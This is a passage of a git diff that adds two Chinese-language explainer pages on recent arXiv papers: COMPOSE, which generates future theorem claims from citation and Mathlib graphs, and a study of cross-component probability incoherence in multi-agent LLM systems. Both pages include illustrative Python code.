benchmark suite(RVV hand-vector 参考实现) +- VecTrans(arXiv:2503.19449)— LLM 改写不可向量化 loop 以触发 autovector diff --git a/src/content/docs/papers/compose-future-theorems.md b/src/content/docs/papers/compose-future-theorems.md new file mode 100644 index 000000000..fe783501f --- /dev/null +++ b/src/content/docs/papers/compose-future-theorems.md @@ -0,0 +1,359 @@ +--- +title: COMPOSE — 从引用与形式结构「合成」未来定理 +来源: https://arxiv.org/abs/2605.30333 +日期: 2026-06-13 +子分类: 定理证明 +分类: 形式化方法 +provenance: pipeline-v3 +--- + +## 从日常类比开始:猜下一本书该写什么章节 + +你在写一本数学教材,已经写到第 5 章。同事问你:「下一章最可能写什么?」 + +你会同时看两样东西: + +1. **学术脉络(科学上下文)**:这章引用了哪些经典论文?同行最近在推什么方向?引用出现在证明里还是背景介绍里?——这告诉你「**大家正在往哪走**」。 +2. **逻辑地基(形式结构)**:第 5 章用到的引理、定理,在 Lean 的 Mathlib 里依赖谁、又能推出谁?——这告诉你「**从现有结果出发,逻辑上还能合法地接什么**」。 + +只盯引用、不看形式依赖,容易猜出「听起来很前沿、但证不出来」的口号;只盯 Mathlib 依赖、不看论文叙事,容易猜出「逻辑上能证、但没人会关心」的边角结论。 + +**COMPOSE**(Busbib & Werman, Hebrew University, arXiv:2605.30333)要做的,就是把这两种约束同时喂给一个数学专用语言模型,让它为**锚点论文(anchor paper)**生成一句「像真会出现在未来论文里的定理式主张」,再用检索 benchmark 检验:生成的主张能否找回**后来真正发表、且引用了该锚点的论文**。 + +类比总结: + +| 日常 | COMPOSE | 论文术语 | +|------|---------|----------| +| 看参考文献判断趋势 | 2-hop 引用子图 + 摘要/定理节点 | Scientific graph $G_s$ | +| 看教材定理依赖链 | Mathlib 对齐 + LeanDojo 依赖扩展 | Formal graph $G_f$ | +| informal 定理 ↔ Lean 定理 | FrenzyMath 检索 + 相似度阈值 | Alignment set $\mathcal{P}$ | +| 两路信息合并后再写 | 双向 cross-attention 融合 | Dual-graph encoder | +| 猜下一篇会 cite 本文的工作 | 生成主张 → 检索 47K 未来论文 | Grounded future mathematical generation | + +--- + +## 这篇论文在解决什么问题 + +### 1. 未来数学主张必须满足双重约束 + +一个** plausible** 的未来数学结果需要: + +- **科学动机**:延续 Lakatos 意义上的研究纲领,跟引用脉络、社区兴趣一致; +- **形式可 grounded**:在已有定义/引理/定理的依赖图上,下一步「能接得上」。 + +现有工作往往只建模一侧: + +| 路线 | 强项 | 盲区 | +|------|------|------| +| 基于引用的 idea generation(GIANTS、GoAI、CoI 等) | 捕捉研究趋势 | 缺少形式依赖,主张可能「逻辑悬空」 | +| 定理证明 / Mathlib 检索(ReProver、DeepSeek-Prover 等) | 严格依赖结构 | 缺少「哪条 informal 方向值得做」的科学语境 | +| 仅 citation GNN 或仅 theorem GNN | 结构感知 | 单源,无法同时 grounded + motivated | + +COMPOSE 提出 **grounded future mathematical generation**:给定锚点论文,联合利用**科学引用图**与**形式定理依赖图**,生成定理式未来主张。 + +### 2. 非平凡对齐:informal 论文 ↔ formal Mathlib + +同一数学内容在 arXiv 正文与 Lean 语法里长相完全不同。COMPOSE 不追求端到端 autoformalization,而采用 **informal-to-informal** 对齐(沿用 FrenzyMath 思路): + +1. 从论文中抽取 informal 定理陈述; +2. 用 E5 嵌入在 FrenzyMath 语料(约 14 万条 Mathlib 定理的自然语言描述)里检索; +3. 相似度高于阈值 $\tau$ 才保留匹配,否则丢弃该定理的形式分支; +4. 以匹配到的 Mathlib 定理为根,用 LeanDojo 沿依赖边扩展局部形式子图。 + +这样约 **108K** 个「科学图 + 形式图」配对样本可用于训练;测试集为 **2024–2025 年 47K** 篇未来数学论文(时间上 hold-out)。 + +--- + +## 核心概念 + +### 1. 科学图 $G_s$(Scientific Citation Graph) + +以锚点论文为中心: + +- **节点**:论文摘要节点(abstract)+ 从 1–2 hop 引用文献中抽取的**定理节点**(theorem); +- **边类型**:引用边、摘要→定理、定理→父定理等; +- **选引用策略**:不是整篇 bibliography 全收,而是按**引用上下文相关性**筛选(最多 1-hop 5 篇、2-hop 每节点 3 篇),优先出现在证明或主结果中的引用; +- **节点初始化**:E5-large-v2 文本嵌入。 + +训练时的**监督目标**来自「未来论文」:某篇在锚点之后发表、且**引用了锚点**的论文,其**主要数学主张**是要生成的 $y$;该未来论文**不能**出现在输入图里(防泄漏)。 + +### 2. 形式图 $G_f$(Formal Theorem Dependency Graph) + +- **节点**:Mathlib 定理(Lean 签名 + 依赖关系); +- **边**:Mathlib 中的 directed dependency(由 LeanDojo 抽取); +- **根节点**:与 $G_s$ 中 informal 定理对齐成功的 Mathlib 定理,标记为 distinct root type; +- **节点初始化**:DeepSeek-Math 对定理签名的嵌入(比 E5 更懂形式数学)。 + +对齐集合 $\mathcal{P} \subseteq V_s^{\mathrm{thm}} \times V_f$ 把两侧定理节点连起来,是跨图融合的锚。 + +### 3. 双图编码器 + 融合 + +两条支路结构相同(2 层 message-passing GNN,hidden 1024),参数不共享: + +``` +G_s → SimpleGNN(E5 init) → h^s ─┐ + ├─ Bridge MLP → 共享 4224 维 +G_f → SimpleGNN(DS-Math init) → h^f ─┘ + ↓ + 双向 cross-attention(各 8 head) + ↓ + 融合节点表示 {h̃_i} → 条件化 DeepSeek-Math-7B +``` + +- GNN 更新:入边/出边消息分别 mean-pool,经 gated residual + LayerNorm,缓解 over-smoothing; +- 融合后表示与 decoder 隐藏态在**第 3,7,11,15,19,23,27,31 层**做 cross-attention(约 20% 层); +- Decoder 用 **LoRA rank 32** 微调。 + +### 4. 两阶段训练 + +**Stage 1(无 decoder)**:只训 GNN、Bridge、Fusion,冻结文本嵌入。 + +- $\mathcal{L}_{link}$:链路预测,让相邻节点表示内积大、非边小; +- $\mathcal{L}_{align}$:对比学习,融合图表示靠近「真实未来论文」的 abstract+claim 嵌入,远离负样本; +- $\mathcal{L}_{cross}$:对齐 $\mathcal{P}$ 中 informal↔formal 定理对,InfoNCE 式对比。 + +**Stage 2(加 decoder)**: + +- 自回归 CE:生成未来数学主张文本; +- **Graph margin loss**:防止 decoder 忽略图条件(无图时 loss 应更差)。 + +若某样本没有任何高置信 Mathlib 匹配,则**仅用科学图编码器**训练(形式支路为空)。 + +### 5. 评估方式 + +主指标不是 ROUGE 抄未来摘要,而是**检索真实未来论文**: + +1. 模型生成主张 $\hat{y}$; +2. 在 **47K** 未来论文池里,用微调过的 DeepSeek-Math 嵌入做相似度检索; +3. 看 ground-truth 未来 citing 论文是否出现在 Top-k。 + +在 confidence-stratified 子集上,COMPOSE **H@10 = 0.508**(CoI-GPT4 约 0.410,GIANTS 约 0.080)。LLM-as-judge 五维(数学内容、技术深度、新颖性、精确性、具体性)综合最优;**Struct.**(含实质数学内容的比例)约 **0.975**。 + +**Fut-R** 指标衡量是否「向前看」: + +$$\mathrm{Fut\text{-}R}=\frac{\mathrm{ROUGE\text{-}L}(\hat{y}, y^{*})}{\mathrm{ROUGE\text{-}L}(\hat{y}, x)}$$ + +> 1 表示生成文本更像未来真定理,而非复述输入;COMPOSE 约 1.223,GIANTS 约 0.314。 + +--- + +## 代码示例 1:用 Python 构造「科学图 + 形式图」的极简骨架 + +下面不是官方实现,但对应论文 §3.1 的数据逻辑,帮助零基础读者把两张图「画」出来: + +```python +from dataclasses import dataclass, field +from typing import Literal + +NodeKind = Literal["abstract", "theorem_informal", "theorem_formal"] + +@dataclass +class Node: + id: str + kind: NodeKind + text: str # 摘要、informal 定理陈述、或 Lean 签名 + embedding: list[float] = field(default_factory=list) + +@dataclass +class Edge: + src: str + dst: str + kind: Literal["cites", "paper_has_theorem", "theorem_dep", "align"] + +@dataclass +class DualGraphExample: + anchor_id: str + scientific: list[Node] + formal: list[Node] + edges_s: list[Edge] + edges_f: list[Edge] + align_pairs: list[tuple[str, str]] # (informal_thm_id, mathlib_thm_id) + target_future_claim: str # 监督:后来 cite 锚点的那篇论文的主主张 + +def build_scientific_subgraph(anchor, refs_hop1, refs_hop2, tau_context=0.5): + """按引用上下文相关性选边,不是全量 bibliography。""" + nodes, edges = [], [] + nodes.append(Node(anchor.id, "abstract", anchor.abstract)) + for ref in select_by_citation_context(refs_hop1, max_papers=5): + nodes.append(Node(ref.id, "abstract", ref.abstract)) + edges.append(Edge(ref.id, anchor.id, "cites")) + for thm in ref.extracted_theorems: + tid = f"{ref.id}::{thm.label}" + nodes.append(Node(tid, "theorem_informal", thm.statement)) + edges.append(Edge(tid, ref.id, "paper_has_theorem")) + # hop-2 同理,每节点最多 3 篇… + return nodes, edges + +def align_to_mathlib(informal_thm, frenzymath_index, sim_threshold=0.72): + """informal-to-informal:E5 检索 FrenzyMath 描述,再映射到 Mathlib。""" + candidates = frenzymath_index.search(informal_thm.statement, top_k=5) + best = max(candidates, key=lambda c: c.cosine) + if best.cosine < sim_threshold: + return None # 该定理无形式分支 + return best.mathlib_theorem_id + +def expand_formal_deps(root_mathlib_id, leandojo, hops=2): + """从对齐根定理沿 Mathlib 依赖边扩展。""" + nodes, edges = [], [] + frontier = [(root_mathlib_id, 0)] + seen = set() + while frontier: + tid, depth = frontier.pop() + if tid in seen or depth > hops: + continue + seen.add(tid) + meta = leandojo.get_theorem(tid) + nodes.append(Node(tid, "theorem_formal", meta.signature)) + for dep in meta.dependencies: + edges.append(Edge(dep, tid, "theorem_dep")) + frontier.append((dep, depth + 1)) + return nodes, edges + +def select_by_citation_context(refs, max_papers): + # 论文附录 A.1:引用出现在证明/主结果中得分更高 + return sorted(refs, key=lambda r: r.citation_importance, reverse=True)[:max_papers] +``` + +要点:**科学图**负责「往哪走」,**形式图**负责「能接什么」;`align_pairs` 是两座桥。 + +--- + +## 代码示例 2:双图融合 + 条件化解码(PyTorch 伪代码) + +对应 §3.2 的 encoder–fusion–decoder 数据流: + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + +class SimpleGNN(nn.Module): + def __init__(self, in_dim, hidden=1024, layers=2): + super().__init__() + self.layers = nn.ModuleList([ + nn.Linear(hidden if i else in_dim, hidden) for i in range(layers) + ]) + self.gates = nn.ModuleList([nn.Linear(hidden * 2, 1) for _ in range(layers)]) + + def forward(self, h, edge_index_in, edge_index_out): + for lin, gate in zip(self.layers, self.gates): + m_in = mean_aggregate(h, edge_index_in) + m_out = mean_aggregate(h, edge_index_out) + msg = F.relu(lin(m_in + m_out)) + g = torch.sigmoid(gate(torch.cat([h, msg], dim=-1))) + h = F.layer_norm(g * msg + (1 - g) * h, h.shape[-1:]) + return h # 再 concat 冻结文本嵌入 → 1152/4096 维上下文向量 + +class ComposeDualEncoder(nn.Module): + def __init__(self, d_s=1152, d_f=4096, d_fused=4224, n_heads=8): + super().__init__() + self.gnn_s = SimpleGNN(d_s) + self.gnn_f = SimpleGNN(d_f) + self.bridge_s = nn.Sequential(nn.Linear(d_s, 2048), nn.GELU(), nn.Linear(2048, d_fused)) + self.bridge_f = nn.Sequential(nn.Linear(d_f, 2048), nn.GELU(), nn.Linear(2048, d_fused)) + self.type_embed = nn.Embedding(2, d_fused) # 0=scientific, 1=formal + self.cross_attn = nn.MultiheadAttention(d_fused, n_heads, batch_first=True) + + def fuse(self, h_s, h_f): + z_s = self.bridge_s(h_s) + self.type_embed(torch.zeros(len(h_s), dtype=torch.long)) + z_f = self.bridge_f(h_f) + self.type_embed(torch.ones(len(h_f), dtype=torch.long)) + # 双向:科学节点 attend 形式节点,再反过来 + z_s2, _ = self.cross_attn(z_s.unsqueeze(0), z_f.unsqueeze(0), z_f.unsqueeze(0)) + z_f2, _ = self.cross_attn(z_f.unsqueeze(0), z_s.unsqueeze(0), z_s.unsqueeze(0)) + z_s = F.layer_norm(z_s + z_s2.squeeze(0), z_s.shape[-1:]) + z_f = F.layer_norm(z_f + z_f2.squeeze(0), z_f.shape[-1:]) + return torch.cat([z_s, z_f], dim=0) # decoder cross-attn 的 K/V + +# Stage 1:对比损失(简化版 L_align) +def alignment_loss(h_graph, e_pos, e_negs, temperature=0.07): + sim_pos = F.cosine_similarity(h_graph, e_pos) / temperature + sim_negs = torch.stack([F.cosine_similarity(h_graph, n) for n in e_negs]) / temperature + logits = torch.cat([sim_pos.unsqueeze(0), sim_negs]) + return F.cross_entropy(logits.unsqueeze(0), torch.zeros(1, dtype=torch.long)) + +# Stage 2:decoder 在指定层把 hidden states 作为 Q,融合图节点作为 K/V +# DeepSeek-Math-7B + LoRA;cross-attn 插入层索引 [3,7,11,15,19,23,27,31] +``` + +训练时若 `h_f` 为空(无 Mathlib 匹配),`fuse` 只返回 `z_s`,与论文「仅 citation encoder」分支一致。 + +--- + +## 代码示例 3:官方 CLI 推理流程(概念) + +仓库 [david-busbib/COMPOSE](https://github.com/david-busbib/COMPOSE) 提供端到端 demo,逻辑与论文 Figure 1 一致: + +```bash +# 给定 arXiv ID,拉 Semantic Scholar 引用 → 建 G_s → FrenzyMath 对齐 → 建 G_f → 生成 n 条未来主张 +python run_compose.py \ + --arxiv 2309.03806 \ + --n 3 \ + --checkpoint checkpoints/compose-ds-math-7b +``` + +内部流水线(摘自项目 README): + +1. 拉取锚点论文及参考文献(Semantic Scholar,无需 API key); +2. E5-large-v2 嵌入摘要,构建 citation 子图; +3. 抽取 informal 定理,嵌入检索 Mathlib4 / FrenzyMath,构建形式子图; +4. 双 GNN + 双向 cross-attention; +5. DeepSeek-Math-7B 解码 `--n` 条 plain-text 未来主张。 + +--- + +## 与相关工作的关系 + +| 工作 | 与 COMPOSE 的差异 | +|------|-------------------| +| **GIANTS** | 用引用上下文生成未来**科学摘要**,不生成定理式主张,不用 Mathlib 结构 | +| **GoAI / FutureGen / ResearchAgent** | 通用 research idea,缺形式 grounded | +| **GoR**(Citation Evolution Graphs) | 也用引用 DAG 监督 LLM,但面向 ML/NLP venue,无 formal graph | +| **Lemmanaid / conjecture generation** | 在形式库内猜新引理,缺 arXiv 科学叙事 | +| **FrenzyMath / Autoformalization** | COMPOSE **消费**对齐结果,目标不是翻译而是**预测未来** | + +COMPOSE 的定位:**informal 研究 front-end**(读论文、看趋势)与 **formal library back-end**(Lean 依赖)之间的桥,用于** grounded 的未来定理式生成**。 + +--- + +## 实验要点与消融 + +- **Paper-graph-only**(去掉 $G_f$):H@10 与 Struct. 均下降,说明形式结构不是装饰; +- **Bag-of-Papers**(打平图结构):弱于完整 GNN,说明**边类型与定理节点**重要; +- **Text-only LoRA**(无图):Fut-R 虚高(2.241)但 BERTScore 更低——更像「改写输入」而非预测未来; +- 嵌入空间上,**原始 cosine 检索**区分度差(Tgt-Neg margin 小),故 benchmark 额外微调 DeepSeek-Math 嵌入做检索。 + +--- + +## 局限与开放问题 + +1. **对齐覆盖率**:大量 informal 定理达不到 FrenzyMath 阈值,只能退化为单图;autoformalization 进步可能扩大 $G_f$。 +2. **时间切分**:训练 2000–2023,测试 2024–2025;领域漂移、Mathlib 版本变化会影响对齐质量。 +3. **「预测」≠「证明」**:生成的是 plausible **claim**,不保证真或可证;更像 research hypothesis 生成器。 +4. **评估依赖检索代理**:H@10 衡量的是「能否找对后来 cite 锚点的那篇」,不是形式验证。 +5. **计算成本**:双 GNN + 7B decoder cross-attn,比纯 prompt baseline 重得多。 + +--- + +## 谁应该读这篇论文 + +- 做 **AI for Math / 自动猜想 / 研究 idea 生成** 的人; +- 把 **Lean/Mathlib 依赖** 当结构信号,而不只做 proof search 的人; +- 关心 **citation graph + KG** 混合 conditioning 的 NLP 研究者; +- 想复现 **108K 双图数据 + 47K 未来检索 benchmark** 的工程师(代码与 project page 已公开)。 + +--- + +## 一句话带走 + +> COMPOSE 把「参考文献告诉你方向」和「Mathlib 告诉你能接什么」编成两张图,用 GNN 分别编码、cross-attention 融合,再条件化 DeepSeek-Math-7B 生成未来定理式主张——在 47K 真实未来论文检索上,比只看 citation 或纯文本微调更 grounded、也更像数学。 + +--- + +## 参考 + +- 论文:[COMPOSE: Composing Future Theorems from Citations and Formal Structure](https://arxiv.org/abs/2605.30333) +- Project page:https://david-busbib.github.io/COMPOSE-page/ +- 代码:https://github.com/david-busbib/COMPOSE +- 对齐语料:FrenzyMath(Gao et al., 2024) +- 形式依赖抽取:LeanDojo(Yang et al., 2023) +- 基线:GIANTS(He-Yueya et al., 2026)、Chain-of-Ideas 等 diff --git a/src/content/docs/papers/compositional-incoherence.md b/src/content/docs/papers/compositional-incoherence.md new file mode 100644 index 000000000..060bf0970 --- /dev/null +++ b/src/content/docs/papers/compositional-incoherence.md @@ -0,0 +1,319 @@ +--- +title: Locally Coherent, Globally Incoherent — 多组件 LLM Agent 的组合不一致性 +来源: https://arxiv.org/abs/2605.30335 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:每个专家都说得对,拼起来却不可能 + +想象你在组织一场关于「2026 年美国最大 AI 公司 IPO 会落在哪个赛道」的预测: + +- **基础设施专家**只盯数据中心/芯片链,给出概率 **0.39** +- **模型实验室专家**只盯大模型公司,给出 **0.73** +- **应用层专家**只盯垂直 SaaS,给出 **0.67** +- **其他赛道专家**负责兜底,给出 **0.71** + +每个人在自己的「局部问题」里都很自洽:概率在 0–1 之间,校准也说得过去。但协调员把四个数字**直接拼成联合报价**时,总和是 **2.50**——没有任何真实概率测度能让四个互斥结果的质量之和超过 1。这不是某个专家「算错了」,而是**结构上**局部合理、全局不可能。 + +Kotawala(Princeton,arXiv:2605.30335)把这类现象正式命名为 **locally coherent, globally incoherent(局部一致、全局不一致,LCGI)**。论文针对的是多组件 LLM Agent:规划器把检索、算术、概率评估路由给不同 specialist,每个组件只看见联合问题的一部分;即使每个组件都经过校准、自洽解码,**聚合后的信念仍可能违反基本概率公理**,从而暴露 Dutch-book(荷兰赌)风险。 + +类比总结: + +| 日常 | 多组件 Agent | 论文术语 | +|------|-------------|---------| +| 四位专家各报局部概率 | 各 sub-agent 输出局部边际 | component marginal $\hat{p}^{(a)}$ | +| 协调员原样拼接 | owner-selected aggregation | 聚合器 $\mathcal{A}$ 只「选坐标」 | +| 四段概率加起来 > 1 | 违反 partition 约束 | 落在 coherent polytope $\mathcal{M}^{\star}$ 外 | +| 看不出谁「错了」 | 单组件监控检测不到 | $\varepsilon^{\star}>0$ 作为系统级证书 | +| 按比例归一化修一下 | 投影到合法概率区域 | hierarchical Boyle–Dykstra / $\Pi^{\star}$ | + +--- + +## 这篇论文在解决什么问题 + +### 1. 现有手段为什么不够 + +对**单个** LLM 输出,业界已有不少「一致性」工具: + +- **校准(calibration)**:让 $P(\text{事件})$ 与长期频率对齐 +- **自洽采样(self-consistency)**:多次采样再投票 +- **保形预测(conformal prediction)**:分布无关的覆盖保证 + +这些都在**组件内部**运作。它们**看不见**跨组件逻辑约束,例如: + +- **否定**:$P(A)+P(\neg A)=1$(两个 specialist 各报一半) +- **划分(partition)**:互斥结果概率之和为 1(多个 specialist 各管一块) +- **合取/析取**:Fréchet 边界约束 $P(A\land B)\leq\min(P(A),P(B))$ 等 + +论文的核心论断:**per-component coherence 一般不能修复 composed system**;失败是**结构性的**,不是 prompt 写不好就能根治。 + +### 2. 论文贡献(操作化视角) + +| 贡献 | 含义 | +|------|------| +| **组合残差** $\varepsilon^{\star}$ | 局部修复后再聚合的报价,到联合 coherent polytope 的 $L_2$ 距离;**运行时**可算 | +| **乘积结构二分法**(Thm 3.3) | 局部一致 ⇒ 全局一致,当且仅当联合多面体可分解为局部笛卡尔积 | +| **Rayleigh 商预测**(Cor 3.9) | 从 specialist 面板协方差预测 $\varepsilon^{\star}$ 量级 | +| **层次 Boyle–Dykstra 投影** | 确定性修复,保留 specialist 路由 | +| **e-process** | 序列部署中的 anytime-valid 一致性监测 | +| **可分解 benchmark** | 1,876 个 ensemble cliques,四类逻辑关系 | + +### 3. 实证快照(论文 §5) + +- 四类 contemporary LLM 组成的中端 panel 上,**33%–94%** 的 clique 出现 $\varepsilon^{\star}>0$ +- 关系类难度排序(约束越紧,残差越大):**partition > negation > disjunction > conjunction** +- Cor 3.9 的 magnitude 预测在四类中**三类误差 < 7%** +- 朴素组合下 exposure 界 $\sqrt{m^{\star}}\varepsilon^{\star}$ 平均约 **0.137**;层次投影可压到 QP 数值地板 +- 三种直觉缓解(检索、partition-aware prompting、aggregator-LLM)**均失败或回退** + +--- + +## 核心概念 + +### 1. Clique 与 coherent polytope + +一个 **clique** $C=(Q_1,\ldots,Q_m,R)$ 包含 $m$ 个 Bernoulli 问题及逻辑关系 $R$。de Finetti 定理保证:所有与 $R$ 一致的边际概率向量构成闭凸多面体 + +$$ +\mathcal{M}_C = \left\{ r \in [0,1]^m : \exists\,\mu \in \Delta(\{0,1\}^m)\ \text{与 } R \text{ 一致} \right\}. +$$ + +**投影** $\Pi_C(\hat{p})$ 是把报价 $\hat{p}$ 投到 $\mathcal{M}_C$ 上最近的点;**残差** $\varepsilon_C(\hat{p})=\|\hat{p}-\Pi_C(\hat{p})\|_2$ 衡量「离合法概率有多远」。 + +### 2. 多组件 Agent 与 owner-selected aggregation + +- $k$ 个子模型,各自输出 $\hat{p}^{(a)} \in [0,1]^{m_a}$ +- 组件级 **JCD(Joint-Coherent Decoding)**:$\Pi_a(\hat{p}^{(a)})\in\mathcal{M}_a$ +- 联合问题集 $\mathcal{Q}^{\star}=\bigcup_a \mathcal{Q}_a$,大小 $m^{\star}$ +- **耦合集** $\mathcal{C}$:跨组件同一问题标识、逻辑关系、跨组件 partition 等 +- **Owner-selected aggregation**:每个联合坐标 $j$ 只由一个组件「拥有」;聚合器**只选取**,不平均、不重采样 + +> 若改用坐标平均 $\mathcal{A}^{\mathrm{avg}}$,凸性保证输出已在 $\mathcal{M}^{\star}$ 内,LCGI **结构性消失**——但代价是每个坐标要 $k$ 次 elicitation,与 specialist 路由的设计目标相悖。 + +### 3. 组合残差 $\varepsilon^{\star}$(Definition 3.1) + +$$ +\varepsilon^{\star}(\hat{p}) = \left\| \mathcal{A}(\Pi_1\hat{p}^{(1)},\ldots,\Pi_k\hat{p}^{(k)}) - \Pi^{\star}\!\left(\mathcal{A}(\Pi_1\hat{p}^{(1)},\ldots,\Pi_k\hat{p}^{(k)})\right) \right\|_2 +$$ + +读法:先把各组件**局部修到自洽**,再按 owner 规则**拼起来**,看这份联合报价离**全局** coherent 集合还有多远。 + +- $\varepsilon^{\star}=0$:局部修复已满足跨组件约束 +- $\varepsilon^{\star}>0$:**证书级**证明系统级不一致;单看任一组件无法发现 + +### 4. 乘积结构二分法(Theorem 3.3) + +记 $\mathcal{M}^{\boxtimes}=\bigcap_a \mathcal{M}_a^{\uparrow}$(只有局部约束、无跨组件耦合时的联合可行集)。 + +**定理**:在 owner-selected aggregation 下, + +$$ +\text{局部一致总能保证全局一致} \iff \mathcal{M}^{\star}=\mathcal{M}^{\boxtimes}. +$$ + +- **相等**:$L_2$ 投影可 blockwise 分解,$\varepsilon^{\star}\equiv 0$(局部-then-global 与 global 交换) +- **真子集**:存在局部皆 coherent 的组成报价,使 $\varepsilon^{\star}>0$ + +这就是论文所称的 **non-commutation theorem**:「先局部修复再聚合」与「先聚合再全局修复」**何时可交换**。 + +### 5. 暴露界与 Brier 改进 + +- **FTAP 暴露**(Cor 3.5):$\mathrm{Exposure}^{\star}\leq\sqrt{m^{\star}}\,\varepsilon^{\star}$ +- **Pythagorean Brier**(Cor 3.6):全局投影确定性降低 Brier,slack 恰为 $(\varepsilon^{\star})^2$ +- **Rayleigh 商**(Cor 3.9):在随机 owner 分配下,$\mathbb{E}[(\varepsilon^{\star})^2]$ 可由 specialist 协方差与约束法向量闭式估计 + +### 6. 层次 Boyle–Dykstra 修复(Theorem 3.10) + +对局部多面体 $\{\mathcal{M}_a^{\uparrow}\}$ 与耦合集 $\mathcal{C}$ 做 **循环 $L_2$ 投影**,收敛到 $\mathcal{M}^{\star}$ 上的最近点。partition 等 equality 约束常可一步闭式(simplex 投影);conjunction/disjunction 的 Fréchet 多面体才需要完整循环。 + +### 7. 运行时三种模式 + +| 模式 | 行为 | +|------|------| +| **Monitor** | 记录 $\varepsilon^{\star}$,超阈值告警 | +| **Repair** | 下游使用前替换为 $\Pi^{\star}(\cdot)$ | +| **Abstain** | $\varepsilon^{\star}>\tau$ 时拒答或升级人工 | + +长期部署还可对残差流 $(\varepsilon^{\star}_t)$ 做 **e-process** 序列检验(§3.7)。 + +--- + +## 代码示例 1:计算 partition 上的组合残差 + +四个 specialist 各报一块互斥赛道的概率,owner-selected 拼接后检查是否违反 $\sum_i p_i = 1$。 + +```python +import numpy as np + +def project_simplex(v: np.ndarray) -> np.ndarray: + """把向量投影到概率单纯形 {x >= 0, sum x = 1}(Euclidean)。""" + v = np.asarray(v, dtype=float) + if v.sum() <= 1 and np.all(v >= 0): + return v + # 经典排序法:O(m log m) + u = np.sort(v)[::-1] + cssv = np.cumsum(u) + rho = np.nonzero(u * np.arange(1, len(v) + 1) > (cssv - 1))[0][-1] + theta = (cssv[rho] - 1) / (rho + 1) + return np.maximum(v - theta, 0) + +def compositional_residual_partition(quote: np.ndarray) -> float: + """ + partition clique:m 个互斥结果,约束 sum(p)=1, p>=0。 + ε* = ||quote - Π*(quote)||_2 + """ + quote = np.clip(np.asarray(quote, dtype=float), 0.0, 1.0) + repaired = project_simplex(quote) + return float(np.linalg.norm(quote - repaired)) + +# 论文 Figure 1 风格:四块 partition,局部各自合理,拼接总和 2.50 +sector_probs = np.array([0.39, 0.73, 0.67, 0.71]) +eps_star = compositional_residual_partition(sector_probs) + +print(f"sum(quote) = {sector_probs.sum():.2f}") # 2.50 +print(f"ε* (partition) ≈ {eps_star:.3f}") # 论文报告 ~0.749(含 JCD 等细节时略异) +print(f"repaired = {project_simplex(sector_probs)}") +print(f"sum(repaired) = {project_simplex(sector_probs).sum():.6f}") +``` + +要点:**每个分量单独看都在 [0,1]**,但联合约束是「质量和为 1」——这就是 $\mathcal{M}^{\star}\subsetneq\mathcal{M}^{\boxtimes}$ 的典型情形。 + +--- + +## 代码示例 2:negation 约束与 exposure 上界 + +两个组件分别回答 $P(A)$ 与 $P(\neg A)$,耦合约束 $p_A + p_{\neg A} = 1$。 + +```python +import numpy as np + +def project_negation_pair(p_a: float, p_not_a: float) -> tuple[float, float]: + """投影到 {p_a + p_not_a = 1, 0<=p<=1}。""" + v = np.array([p_a, p_not_a], dtype=float) + v = np.clip(v, 0.0, 1.0) + s = v.sum() + if abs(s - 1.0) < 1e-12: + return float(v[0]), float(v[1]) + # 等式约束下的 L2 投影:沿 (1,1) 方向平移 + shift = (s - 1.0) / 2.0 + v = v - shift + v = np.clip(v, 0.0, 1.0) + # 若 clipping 破坏等式,再投影一次(小规模闭式足够) + if abs(v.sum() - 1.0) > 1e-9: + v = project_simplex(v) + return float(v[0]), float(v[1]) + +def exposure_bound(eps_star: float, m_star: int) -> float: + """Cor 3.5: Exposure* <= sqrt(m*) * ε*(论文实验用 LMSR 统计)。""" + return float(np.sqrt(m_star) * eps_star) + +# 研究组件报 P(Republican)=0.6,预测组件报 P(Democrat)=0.6 —— 论文引言例子 +p_rep, p_dem = 0.6, 0.6 +quote = np.array([p_rep, p_dem]) +repaired = np.array(project_negation_pair(p_rep, p_dem)) +eps = float(np.linalg.norm(quote - repaired)) + +print(f"naive mass = {quote.sum():.2f}") # 1.20 —— 不可能测度 +print(f"ε* (negation) ≈ {eps:.3f}") +print(f"repaired = {repaired}, sum = {repaired.sum():.3f}") +print(f"exposure bound sqrt(m*)ε* ≈ {exposure_bound(eps, m_star=2):.3f}") +``` + +若 $p_A+p_{\neg A}=1.2$,则存在**无风险套利组合**(Dutch book):对手可以在你的报价上同时买/卖合约锁定正收益。论文强调:**各组件局部 Dutch-book exposure 可为 0**,正暴露**完全来自跨组件 incoherence**。 + +--- + +## 代码示例 3:模拟 owner-selection 与 Rayleigh 商量级(可选直觉) + +```python +import numpy as np + +def expected_eps_sq_rayleigh(panel: np.ndarray, a: np.ndarray, kappa: float = 1.0) -> float: + """ + Cor 3.9 简化版:E[(ε*)^2] ≈ κ * (a^T D a / ||a||^2) + panel: shape (k, m) — k 个 specialist 在 m 维联合坐标上的 JCD 后报价 + a: 绑定约束的法向量(partition 时 a=1 向量;negation 时 a=(1,1)) + """ + bar = panel.mean(axis=0) + D = np.diag(((panel - bar) ** 2).mean(axis=0)) # 独立 owner 分配下的有效协方差 + num = float(a @ D @ a) + den = float(a @ a) + return kappa * num / den + +# 4 个 LLM 对 4 维 partition 各给一个「偏乐观」报价(示意) +rng = np.random.default_rng(0) +panel = rng.uniform(0.45, 0.75, size=(4, 4)) +a_partition = np.ones(4) +pred = np.sqrt(expected_eps_sq_rayleigh(panel, a_partition, kappa=1.0)) +print(f"predicted E[ε*] (order of magnitude) ≈ {pred:.3f}") +``` + +论文在 1,876 个 cliques 上验证:该预测与观测 residual 在 negation / partition / disjunction 上匹配良好;conjunction 因 $\bar{\Pi}$ 离边界较远,经验 $\kappa$ 略低。 + +--- + +## 四类逻辑关系与难度排序 + +| 关系类 | 典型约束 | 耦合强度 | 经验 residual 倾向 | +|--------|---------|---------|-------------------| +| **Conjunction** | Fréchet 上界 | 较弱 | 最小 | +| **Disjunction** | Fréchet 下界 | 中等 | 较小 | +| **Negation** | $p+q=1$ | 较强 | 较大 | +| **Partition** | $\sum p_i=1$ | 最强 | **最大** | + +partition 的修复在「未 clip」情形下甚至就是给每个坐标减去 $(\sum p_i - 1)/m^{\star}$——算法简单,但**原始错误最大**,因为约束直接作用于质量和。 + +--- + +## 与 Agent 框架的关系 + +LangGraph、AutoGen、CrewAI 等框架常见模式: + +1. Planner 路由子任务 +2. 各 tool / sub-agent 返回局部结论(含概率、分类、数值) +3. Orchestrator **拼接**进下游 prompt 或决策 + +若步骤 3 是 owner-selected(每个字段来自单一 specialist),且存在跨字段逻辑约束,则 LCGI **不是 edge 